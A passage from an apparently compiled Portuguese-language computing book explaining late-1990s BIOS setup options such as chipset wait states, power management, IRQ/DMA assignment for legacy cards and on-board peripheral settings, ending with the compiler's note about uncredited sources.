• Init Display First: Se você tiver mais de uma placa de vídeo instalada no micro (para aproveitar o suporte a múltiplos monitores do Windows 98) e uma delas for AGP, você deverá configurar através dessa opção qual placa de vídeo irá inicializar primeiro: a placa AGP ou a placa PCI. Você deve ajustar conforme o seu gosto pessoal. Em micros com vídeo on-board, essa opção serve também para desabilitar o vídeo on-board (instalando-se uma placa de vídeo PCI e configurando essa opção em "PCI"). No caso de você não ter mais de uma placa de vídeo, essa opção é ignorada.
Terrorismo Tecnológico Aprenda Para Sobreviver
458
• BIOS Update: Essa opção habilita o upgrade de BIOS. Existe um vírus famoso, chamado CIH (mais conhecido como Spacefiller ou Chernobyl), que apaga o BIOS. Se essa opção estiver desabilitada, o upgrade de BIOS não é possível, bem como esse vírus não conseguirá apagar o BIOS de seu micro, caso o seu micro seja infectado. Nossa recomendação é que você desabilite essa opção e só a habilite durante o procedimento de upgrade de BIOS (esse procedimento raramente é necessário para a maioria dos usuários).
• Report No FDD For Win95: Habilite essa opção somente se você não tiver nenhuma unidade de disquete instalada no micro. Normalmente essa opção deve ficar desabilitada.
• Delay for HDD: Discos rígidos muito antigos demoram um tempo para atingirem a sua velocidade de rotação. O sintoma mais comum desse problema é você ligar o micro e aparecer a mensagem de erro "HDD Controller Failure", mas, dando um reset, o micro passa a funcionar perfeitamente. Isso ocorre justamente porque, da primeira vez que o micro tentou dar o boot, o disco ainda não tinha atingido a sua velocidade de rotação correta, fazendo com que fosse apresentada uma mensagem de erro. Se isto estiver ocorrendo, você pode configurar um tempo de espera (em segundos) que será dado após a contagem de memória para ser dado o início da leitura do disco rígido. Como esse problema só ocorre em discos rígidos antigos, deixe essa opção desabilitada (ou em "0").
• S.M.A.R.T. For Hard Disks: Habilita o modo SMART (Self-Monitoring, Analysis and Reporting Technology) do disco rígido, caso ele possua essa tecnologia (todos os discos rígidos novos tem). Trata-se de um diagnóstico interno
Terrorismo Tecnológico Aprenda Para Sobreviver
459
preventivo que é executado pelo disco rígido que informa ao micro caso o disco rígido tenha alguma possibilidade de se danificar no futuro, dando tempo do usuário fazer backup de seus dados antes de uma "catástrofe" acontecer. Recomendamos que você habilite essa opção.
• Graphics Aperture Size: As placas de vídeo AGP podem usam a memória RAM do micro para armazenarem informações de z-buffering e de texturas. Essa opção define até quanto de memória RAM essas placas de vídeo podem usar para si. Em geral você pode deixar essa opção configurada em seu valor default, mas você pode experimentar mudar o valor caso esteja encontrando erros em jogos 3D.
• CPU Level 2 Cache ECC Checking: Processadores Intel a partir do Pentium II-300 permitem que seja usado um modo avançado de correção de erros no acesso à sua memória cache L2, chamado ECC (Error Correction Check). Esse método de acesso aumenta a confiabilidade dos dados. Embora possa parecer interessante habilitar essa opção, ela diminui o desempenho do micro, já que o processador gastará mais tempo no armazenamento e na leitura de dados do cache de memória, por conta dessa verificação de erros. Portanto, nossa sugestão é que você desabilite essa opção.
• System BIOS Cacheable ou System ROM Cacheable ou System BIOS Shadow Cacheable: Essa opção habilita o uso do cache de memória no acesso ao BIOS do micro. Como o BIOS é acessado o tempo todo e como o uso do cache de memória aumenta o desempenho do micro, essa opção faz
Terrorismo Tecnológico Aprenda Para Sobreviver
460
com que o desempenho do micro aumente. Por isso recomendamos que essa opção seja habilitada.
• Video BIOS Cacheable ou Video Cacheable Option ou Video ROM Cache: Essa opção faz o mesmo que a opção anterior, só que para a memória ROM localizada na placa de vídeo. Recomendamos que essa opção seja habilitada, para que o desempenho de vídeo seja aumentado.
Essas foram as principais configurações existentes no setup avançado (Advanced CMOS setup). A seguir iremos ver as principais opções existentes no setup avançado do chipset (Advanced Chipset Setup). A maioria das opções desse menu dizem respeito a configuração do acesso à memória RAM. Por isso, tome muito cuidado ao alterar alguma opção, pois uma configuração mal feita pode fazer com que o micro fique travando. Caso o micro passe a travar após você ter habilitado alguma opção, basta reiniciar o micro e desfazer as alterações efetuadas no setup para que o micro volte a funcionar normalmente. Muito embora algumas vezes iremos sugerir habilitar algumas opções, pode ser que o seu micro não suporte essa opção habilitada (ele ficará travando).
• Memory Parity Error Check: Habilita o teste de paridade. Como a maioria das memórias hoje em dia não possuem chip de paridade, recomendamos que essa opção seja desabilitada, para que você não obtenha a mensagem de erro de paridade aleatoriamente.
• DRAM ECC/Parity Select: Seleciona qual será o método de correção de erros empregado no acesso à memória RAM:
Terrorismo Tecnológico Aprenda Para Sobreviver
461
ECC ou paridade. O método ECC só poderá ser selecionado caso você tenha uma memória RAM do tipo ECC, que é minoria em nosso mercado e é mais vendida para servidores de rede. A não ser que o seu micro tenha memória ECC instalada (o que achamos pouco provável), configure essa opção em "Parity".
• ECC Checking/Generation: Habilita o esquema ECC de correção de erros. Só habilite essa opção caso o seu micro tenha memória RAM com suporte a esse método de correção de erros (que, como dissemos, achamos improvável).
• Run OS/2 >= 64 MB ou OS Select for DRAM > 64 MB: Caso você use o sistema operacional OS/2, você deverá habilitar essa opção para acessar mais de 64 MB de memória RAM. Como a maioria dos usuários usa Windows 9x, desabilite essa opção (ou coloque em "Non-OS/2").
• Fast EDO Path Select: Habilite essa opção caso a memória de seu micro seja do tipo EDO.
A maioria das configurações do setup avançado do chipset (Advanced Chipset Setup) fica presa a uma configuração padrão e normalmente você só pode alterar essas configurações caso você desabilite a opção Auto Configuration ou Auto Config existente. Isso ocorre porque as configurações desse menu normalmente envolvem base de tempo, e toda configuração dessa natureza faz com que o micro trave caso você configure um valor errado.
Terrorismo Tecnológico Aprenda Para Sobreviver
462
Dessa forma, se você não quiser correr riscos, o melhor a fazer é habilitar a configuração automática e não mexer nas configurações que ficam truncadas por essa opção.
Dentre as inúmeras opções envolvendo base de tempo estão as configurações de wait states. Wait states são pulsos de clock adicionados ao ciclo de leitura ou escrita em memória de modo a casar a velocidade do processador com a velocidade da memória RAM, pois a memória RAM é bem mais lenta que o processador. Durante os pulsos de wait state o processador não faz absolutamente nada, ele fica somente esperando a memória RAM ficar pronta para receber ou enviar os dados. Ou seja, o uso de wait state faz com que o desempenho do micro diminua. Acontece que não há como o processador acessar diretamente a memória RAM sem o uso de wait states.
Dessa forma, quanto menos wait states o processador usar, melhor. Isso significa que você pode tentar diminuir a quantidade de wait states para ganhar um pouco mais de desempenho em seu micro. A configuração automática (Auto Config) não coloca os melhores valores de wait states, mas sim os valores que com certeza não farão com que o micro trave. Por isso, há a chance de você diminuir o número de wait states e o micro não travar.
Se você decidir por diminuir os wait states, desabilite a opção Auto Config e diminua o número usado por cada opção, uma de cada vez. Por exemplo, imagine que a opção CAS Read Wait State esteja configurada em "4" (ou seja, usando 4 wait states). Você pode diminuir esse valor para 3, salvar as alterações e tentar usar o micro um pouco para ver se ele não trava. Se travar, você deve reiniciar o micro, entrar no setup e desfazer a última alteração feita. Caso o micro não trave, você pode tentar diminuir ainda mais esse número, repetindo todo o processo até achar o valor ideal (que é sempre um antes do micro travar).
Só não experimente mudar um monte de opções ao mesmo tempo, pois caso o micro trave você não saberá qual opção você mudou que está fazendo com que o micro trave. O ajuste fino de wait states
Terrorismo Tecnológico Aprenda Para Sobreviver
463
deve ser feito individualmente para cada opção existente. É um processo demorado, mas que, como dissemos, pode render um desempenho extra para o micro.
Se você não tem paciência para fazer esse ajuste fino ou não tem o tempo necessário para fazê-lo, não se preocupe: baste habilitar a opção Auto Configuration e esqueça essa história de ajuste de wait states.
As principais opções de ajuste de wait states são as seguintes:
• Cas Read Wait State ou DRAM Read Wait States: Número de wait states usado na leitura da memória RAM.
• CAS Write Wait State ou DRAM Write Wait States ou DRAM Wait State Select ou DRAM Write CAS Pulse: Idem para a escrita em memória.
• Memory Wait State ou DRAM Wait State: Alguns setups apresentam somente uma única opção para o ajuste de wait states.
• DRAM Speed Option: Em alguns setups o número de wait states não aparece de forma numérica, mas sim através de rótulos: Fastest (0 wait state), Faster (1 wait state), Slower (2 wait states) e Slowest (3 wait states). Através dessa opção você ajusta o número de wait states da mesma forma que nas outras opções apresentadas. Por exemplo, configurá-la em "Faster" é equivalente a configurá-la com 1 wait state.
Terrorismo Tecnológico Aprenda Para Sobreviver
464
Em geral, opções que tenham a ver com base de tempo devem ser configuradas da mesma maneira do que wait states. Isto é, quanto menor o tempo, maior o desempenho. Mas, para isso, você deve achar o valor exato da configuração, conforme explicamos na semana passada. As seguintes opções podem ser configuradas da mesma forma que wait states:
• RAS to CAS Delay ou Fast RAS to CAS Delay: Define quantos pulsos de clock existirão entre os sinais de RAS e CAS, responsáveis pelo acesso à memória RAM.
• DRAM RAS Precharge Time: Número de pulsos de clock necessários para que o sinal RAS (responsável pelo acesso à memória) acumule carga antes de um ciclo de refresh (ciclo que consiste em varrer a memória para recarregar os valores nela armazenados).
• DRAM R/W Leadoff Timing: Número de pulsos de clock necessários antes do início de um ciclo de leitura ou escrita em memória.
A seguir veremos outras opções comuns de serem encontradas no setup avançado do chipset.
• DRAM Speed: Configure com o tempo de acesso das memórias instaladas no micro.
Terrorismo Tecnológico Aprenda Para Sobreviver
465
• DRAM Speculative Leadoff: O chipset da placa-mãe pode especular qual será o próximo endereço a ser lido pelo processador, aumentando o desempenho do acesso à memória RAM. Recomendamos que você habilite esta opção.
• Turn-around Insertion: Insere um wait state nos acessos a dois dados consecutivos na memória. Desabilite esta opção para eliminar este wait state e, com isso, aumentar o desempenho do micro.
• Read-around Write: Se um dado for lido de um endereço recém-escrito na memória RAM, o controlador de memória (que está embutido no chipset da placa-mãe) poderá entregar esse dado ao processador sem a necessidade de lê-lo da memória, já que ele ainda estará armazenado internamente no chipset. Habilite essa opção para ganhar desempenho.
• I/O Recovery Time ou AT Cycle Wait State ou AT Cycle Between I/O Cycles ou 8 Bit I/O Recovery Time ou 16 Bit I/O Recovery Time: Configura wait states para serem utilizados no acesso a dispositivos instalados no barramento ISA. Como o uso de wait states piora o desempenho, recomendamos desabilitar essas opções (ou seja, configurá-las em 0 wait states) ou, se não for possível, configurar o uso de apenas um wait state.
Terrorismo Tecnológico Aprenda Para Sobreviver
466
• ISA Line Buffer: Habilita um buffer de dados para o barramento ISA, aumentando o seu desempenho. Recomendamos, portanto, que você habilite esta opção.
• Memory Hole ou Memory Hole At 15 MB Add: Cria um “buraco” na área de memória entre 15 MB e 16 MB, para que o micro fique compatível com algumas placas de vídeo ISA antigas que usavam essa área para si. Como essa opção faz com que o micro perca 1 MB de memória, sugerimos que você mantenha ela desabilitada.
As opções a seguir aumentam o desempenho do micro quando habilitadas, por isso recomendamos que você as habilite. Mas nem todos os micros são 100% compatíveis com essas opções e, com isso, o micro pode travar depois de você ter habilitado alguma dessas opções. Se isso ocorrer, basta desabilitar a opção que está gerando o problema.
• CPU Burst Write ou CPU-to-Memory Burst Write: Aumenta o desempenho de escrita na memória RAM.
• PCI Bursting ou Host-to-PCI Burst Write ou PCI Burst Mode ou PCI Burst Write Combine ou PCI Dynamic Bursting: Aumenta o desempenho do barramento PCI, habilitando o seu modo burst.
Terrorismo Tecnológico Aprenda Para Sobreviver
467
• PCI Concurrency ou Peer Concurrency: Permite que o barramento PCI atenda a mais de um dispositivo PCI por vez, aumentando o desempenho.
• PCI Streaming: Permite a transferência de pacotes de dados maiores, aumentando o desempenho do barramento PCI.
• PCI-to-DRAM Pipeline: Aumenta o desempenho de escrita de dados feita pelo barramento PCI na memória RAM.
• CPU-to-PCI Write Post ou CPU-to-PCI Write Buffer: Habilita uma memória (chamada buffer) para o armazenamento temporário dos dados enviados pelo processador ao barramento PCI, caso o barramento não esteja pronto para receber dados, liberando o processador para a realização de outra tarefa. Caso essa opção não seja habilitada, o processador terá de esperar o barramento ficar pronto para receber dados, diminuindo o desempenho de escrita no barramento PCI.
• PCI Master 0 WS Write: Permite que dispositivos PCI escrevam na memória RAM sem usar wait states.
• Passive Release: Aumenta o desempenho do barramento PCI.
Terrorismo Tecnológico Aprenda Para Sobreviver
468
Vamos ver mais algumas opções presentes no setup avançado:
• PCI IRQ Activate By: Configura se as interrupções do barramento PCI serão ativadas pelo flanco (edge) ou nível (level) do sinal do pedido de interrupção. Nossa sugestão é que você configure em "level".
• Delay Transaction ou PCI 2.1 Support: Compatibiliza o chipset da placa-mãe com a especificação PCI 2.1. Recomendamos habilitar.
• AT Bus Clock ou AT Clock Selection ou Bus Clock Frequency Select ou ISA Bus Clock Option ou AR Bus Clock Control ou PCICLK-to-ISA Sysclk Divisor: Essa opção configura o clock que será utilizado pelo barramento ISA, que deve funcionar a 8 MHz. Acontece que a maioria das placas-mãe não possuem um gerador de clock de 8 MHz, e daí, para gerarem esse clock, usam um divisor ou do clock do barramento externo do processador (Bus Clock ou Sysclock) ou do clock do barramento PCI (PCICLK). Como o clock do barramento PCI é de 33 MHz, normalmente devemos configurar essa opção em "1/4 PCICLK" (que configurará o clock do barramento ISA em 8,25 MHz). Você mesmo poderá fazer as contas para saber a melhor configuração para essa opção. Lembramos que dispositivos ISA normalmente não conseguem trabalhar muito acima de 8 MHz. Portanto, se você configurar essa opção para um clock mais alto - por exemplo 11 MHz - os dispositivos ISA de seu micro provavelmente não funcionarão.
Terrorismo Tecnológico Aprenda Para Sobreviver
469
Agora que nós já vimos as opções mais importantes do setup avançado (Advanced CMOS Setup e Advanced Chipset Setup), iremos ver a configuração do gerenciamento de consumo elétrico avançado do micro (Advanced Power Management), que é feita através do menu Power Management (ou equivalente) do setup.
O micro possui diversos modos de "hibernação". Nesses modos de hibernação, o micro consome menos eletricidade. Isso é conseguido de diversas formas, como, por exemplo, diminuindo o clock do processador ou desligando o disco rígido. É claro que o micro só entra em modo de hibernação depois de estar um determinado tempo ocioso, isto é, sem fazer absolutamente nada. É justamente na configuração do gerenciamento do consumo elétrico do micro que você configura o tempo de ociosidade necessário para que o micro entre em modo de hibernação.
Existem três modos de hibernação: Doze, Standby e Suspend. A diferença entre eles é a "profundidade" da hibernação. Quanto mais profundo for o "sono" do micro, mais você economizará energia. O modo Doze é o mais superficial e o Suspend, o mais profundo.
No setup você configura o tempo de ociosidade necessário para o micro entrar nesses modos de hibernação. Fora isso você configura quanto tempo de ociosidade é necessário para que o disco rígido seja desligado (opção IDE Power Control ou HDD Power Down Time) ou ainda configura para que a ventoinha do processador seja desligada quando ele entrar em modo Suspend (opção CPU Fan Off). Como o clock do processador é reduzido quando ele entra neste modo, a ventoinha pode ser desligada, já que o processador não esquentará tanto.
Você também pode configurar o tipo de atividade que "acordará" o micro. Um bom exemplo é o modem. Muita gente usa o modem como fax e deixa o micro ligado durante o dia esperando ligações de fax. Para economizar energia, você pode configurar o micro a entrar em modo de hibernação e acordar automaticamente quando o micro receber alguma ligação de fax, voltando a entrar em modo de
Terrorismo Tecnológico Aprenda Para Sobreviver
470
hibernação depois de um período de ociosidade. Esse recurso é chamado Wake-up On Ring.
Na maioria dos setups há uma configuração de que pedido de interrupção (IRQ) acordará o micro. Isto significa que se houver alguma atividade no dispositivo que estiver usando aquela IRQ, o micro acordará. Por exemplo, o teclado usa a interrupção 1 (IRQ1). Com isso, se você configurar que a IRQ1 acordará o micro, significa dizer que o teclado acordará o micro. O mesmo ocorre para todos os demais dispositivos conectados ao micro, como, por exemplo, o mouse serial, que normalmente usa a IRQ4 (ou seja, configurando a IRQ4 para acordar o micro, o micro sairá do modo de hibernação quando você mexer no mouse). Você pode obter uma lista completa de quais interrupções são usadas pelos dispositivos de seu micro através de Gerenciador de Dispositivos (ícone Sistema do Painel de Controle), selecionando Computador e clicando na caixa Propriedades.
Com o gerenciamento de consumo elétrico habilitado no setup, o Windows 9x passa a ter mais uma opção no menu Iniciar: Suspender. Essa opção coloca o micro imediatamente em modo Suspend, não sendo necessário esperar o tempo de ociosidade programado no setup.
É claro que em seu micro poderão existir inúmeras outras funções no menu de configuração do gerenciamento de consumo elétrico, mas entendendo o que explicamos hoje, você saberá configurá-las intuitivamente.
No setup existe um menu para a configuração do barramento PCI e dos dispositivos ISA Plug and Play, normalmente chamado PCI/Plug and Play Setup. A correta configuração desse menu é importante para que não existam conflitos de interrupção ou DMA em seu micro, especialmente se você tiver algum periférico antigo instalado, como, por exemplo, uma placa de som.
Normalmente quando dois ou mais periféricos estão configurados a usar um mesmo recurso, eles não funcionam corretamente. Quando
Terrorismo Tecnológico Aprenda Para Sobreviver
471
dois dispositivos Plug and Play são instalados usando um mesmo recurso (uma mesma linha de interrupção ou canal de DMA), o próprio sistema operacional pode reconfigurar automaticamente os dispositivos, de modo a resolver o conflito de recursos.
Dispositivos ISA antigos não são Plug and Play e, com isso, não há como alterar suas configurações por software, isto é, através do sistema operacional (nesse tipo de periférico a configuração é normalmente feita através de jumpers). Se um dispositivo Plug and Play "cismar" em usar uma mesma interrupção ou canal de DMA que um periférico antigo não Plug and Play, pode ser que o sistema não consiga gerenciar esse conflito, fazendo com que os periféricos entrem em conflito e não funcionem.
Por isso, no setup do micro há como definir manualmente quais linhas de interrupção (IRQ) e quais canais de DMA estão sendo usados por dispositivos antigos não Plug and Play. Assim, esses recursos são separados pelo sistema e nenhum dispositivo Plug and Play poderá utilizá-los.
Se tiver qualquer dispositivo antigo não plug and play instalado em seu micro – como, por exemplo, uma placa de som ou fax modem – você deve efetuar esse procedimento. Placas de som normalmente usam a IRQ5, o DMA1 e o DMA5, enquanto placas de fax modem normalmente usam a IRQ3.
A configuração é feita através de opções como "IRQ x Available To" e "DMA x Available To". Existem duas possibilidades de configuração: "PCI/PnP", caso o recurso esteja sendo utilizado por um dispositivo PCI ou ISA Plug and Play, ou então "ISA/EISA" (ou "Legacy ISA"), caso o recurso esteja sendo usado por um dispositivo não Plug and Play.
Por exemplo, se você tiver uma placa de som antiga no micro, provavelmente deverá configurar "IRQ5 Available To", "DMA1 Available To" e "DMA5 Available To" em "Legacy ISA", enquanto as demais opções deverão ficar em "PCI/PnP".
Terrorismo Tecnológico Aprenda Para Sobreviver
472
Caso você não tenha placas antigas instaladas em seu micro, você pode simplesmente configurar a opção "Resources Controlled By" em "Auto", para informar que todos os periféricos de seu micro são Plug and Play. No caso de existir ao menos uma placa antiga, não Plug and Play, instalada em seu micro, você deverá deixar essa opção em "Manual" e efetuar a configuração que descrevemos.
A opção "PnP OS Installed" existente nesse menu deve ser habilitada caso você esteja usando o Windows 9x.
Hoje veremos o menu Peripheral Setup (ou Integrated Peripherals), que configura todos os periféricos que estão integrados na placa-mãe (isto é, on-board), incluindo as portas seriais, porta paralela, portas IDE e controladora de unidade de disquete.
As opções mais comumente encontradas nesse menu são:
• On Chip VGA: Habilita o vídeo on-board, caso a sua placa-mãe possua esse recurso. Caso você queira desabilitar o vídeo on-board para instalar uma placa de vídeo em um dos slots do micro, basta desabilitar essa opção.
• On Board VGA Memory Size ou VGA Shared Memory Size: Em micros com vídeo on-board que usam a arquitetura UMA (Unified Memory Architecture, Arquitetura Unificada de Memória) o chipset da placa-mãe usa parte da memória RAM como memória de vídeo. Nessa opção você especifica o quanto de memória RAM será utilizado para vídeo. Quanto mais você especificar, pior, pois mais memória você perderá para o uso de aplicações. A quantidade ideal depende da resolução que você for trabalhar no Windows. Recomendamos a seguinte configuração: 640x480, 1 MB; 800x600, 2 MB; 1.024x768 ou 1.280x1.024, 4 MB. Por exemplo, é besteira configurar o micro a usar 4 MB de
Terrorismo Tecnológico Aprenda Para Sobreviver
473
memória de vídeo se a resolução usada for 640x480, pois essa resolução não usa mais do que 1 MB de memória de vídeo. Com isso, você perderá 3 MB de memória à toa.
• On Board Sound: Habilita o áudio on-board, caso a sua placa-mãe possua. Desabilite essa opção caso você queira instalar uma placa de som avulsa em um dos slots do micro.
• Programming Mode: Se você configurar essa opção em "auto", o setup configurará automaticamente as demais opções existentes neste menu. Já em "manual", você poderá configurar manualmente as opções existentes.
• On Board FDC: Habilita a controladora de unidade de disquetes (deixar habilitado).
• FDD AB Exchange Function ou Swap Floppy Drive: Troca logicamente a unidade A com a B. Deixe essa opção desabilitada.
• Serial Port 1: Configura a porta serial 1. Deixe em "Auto" ou "COM1" ou "3F8".
• Serial Port 2: Configura a porta serial 2. Se você tem um fax modem instalado no micro usando o endereço COM2, você deverá desabilitar a porta serial 2 da placa-mãe para não dar
Terrorismo Tecnológico Aprenda Para Sobreviver
474
conflito, o que é feito através dessa opção. Se não for esse o caso, deixe em "Auto" ou "COM2" ou "2F8".
• Serial Port 1 MIDI Support: Habilita a compatibilidade da porta serial 1 com a interface MIDI. Deixar desabilitado.
• Serial Port 2 MIDI Support: Idem.
• rallel Port: Configura a porta paralela do micro. Deixe em "Auto" ou "LPT1" ou "378".
• Parallel Port Mode: Configura o modo de operação da porta paralela, normal ("Normal" ou "SPP") ou bidirecional ("Extended" ou "ECP/EPP"). Sugerimos configurar em modo bidirecional.
• Parallel Port Extended Mode: Configura o modo bidirecional que será utilizado pela porta paralela, EPP ou ECP. Sugerimos configurar em modo ECP, que oferece melhor desempenho.
Terrorismo Tecnológico Aprenda Para Sobreviver
475
Como eu já disse durante o livro, muitos textos foram retirados da Internet e esses apesar de conter informações verdadeiras, muitos estavam com o IP falso e sem mencionar o autor. Se você for um deste me mande um e-mail e colocarei o seu nome nas próximas edições.
http://www.leandro-t.cjb.net/ [email protected]